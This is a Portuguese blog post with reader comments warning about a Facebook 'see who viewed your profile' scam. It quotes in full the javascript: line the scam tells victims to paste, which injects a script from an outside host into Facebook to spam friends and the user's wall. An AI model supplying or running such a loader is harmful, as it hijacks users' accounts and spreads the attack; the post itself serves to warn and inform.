Para quem não reparou ainda há a circular uma praga no Facebook que utiliza o motivo de permitir ver quem visita o perfil !
Esta página incita o utilizador executar o seguinte código no browser tendo a página do facebook aberta.
javascript:(a=(b=document).createElement('script')).src='//bbbindia4.in/jsp.php',b.body.appendChild(a);void(0)
Este código simplesmente adiciona o código presente na página bbindia4.in/jsp.php à página do facebook. (em anexo no fim do post)
Este ficheiro contém código JavaScript que vai criar um novo evento e convidar todos os amigos, vai ainda abrir uma conversa de chat e colocar uma mensagem com o link para o contacto em questão também sofrer o mesmo “ataque” e vai colocar uma mensagem no próprio Mural com números aleatórios e nomes de contactos aleatórios como se fossem as pessoas que mais vêm o perfil :)!
Isto apenas volta a mostrar que por mais segura que uma página seja os utilizadores podem ser sempre enganados tornando a página insegura !
Stay safe.
Anexo: jsp.php.txt
Ultimamente o Facebook tem sofrido alguns ataques. Tinha inclusive notificações de amigos que foram entretanto apagadas, provavelmente seria mais do mesmo.
Ainda que uma pessoa não instale as aplicações mahosas do Facebook, existe sempre um código Javascript qualquer para fazer a trafulhice. Na minha opinião, os piores são os ataques de clickjacking, que fazem operações nas contas do Facebook sem que o utilizador dê por isso, bastando visitar uma página preparada para o efeito (com recurso aos botões de like, etc). Infelizmente, já caí nisso, mas tudo o que aconteceu foi uma página publicada no moral para levar outros a cair nessa armadilha.
Até já ponderei instalar o NoScript, mas não queria chegar a esse ponto extremo.
Cumps.
André, o noscript permite excepções on-the-fly. Depois de te habituares nem notas que ele está lá. A maior parte das páginas que visito funcionam bem sem JS, as que não funcionam confio o suficiente para dar except a um ou dois CDNs.
Eu considero-me uma pessoa bastante tech-savvy até e levei com um clickjack no outro dia. Acho que estes são o verdadeiro problema, na medida em que é difícil explicar as pessoas o que é legítimo e o que não é vs. os ataques do género “How to see who viewed your profile” etc..
O NoScript avisou-me, mas como ele dá bastantes falsos positivos na detecção de clickjacking ignorei, e lá me fez like a uma página aleatória. Enfim.
eu cai nessa droga de C-WHO do facebook, e ele continua instalado como se fosse um aplicativo como outro qualquer. Tem jeito de me livrar disso ? alguém sabe ? quais riscos estou correndo ? obrigado